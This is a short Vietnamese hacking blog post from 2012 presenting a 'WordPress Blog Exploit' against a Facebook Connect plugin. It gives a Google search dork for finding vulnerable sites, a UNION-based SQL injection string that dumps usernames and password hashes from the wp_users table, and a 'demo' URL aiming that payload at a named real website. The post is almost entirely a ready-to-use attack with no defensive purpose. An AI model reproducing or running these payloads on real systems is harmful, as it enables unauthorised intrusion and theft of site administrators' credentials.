Trang chủ
»
Hacking and Security
»
SQL Injection
» WordPress Blog Exploit |inurl:"fbconnect_action=myhome"
29 thg 10, 2012
WordPress Blog Exploit |inurl:"fbconnect_action=myhome"
search google: inurl:"fbconnect_action=myhome"thay
?fbconnect_action=myhome&userid=
bằng
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z0mbyak,7,8,9,10,11,12+from+wp_users--
demo :
http://boneramamusic.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+%20select+1,2,3,4,5,concat(user_login,0x3a,user_pass)%20z%E2%80%8B0mbyak,7,8,9,10,11,12+from+wp_users--
Không có nhận xét nào:
Đăng nhận xét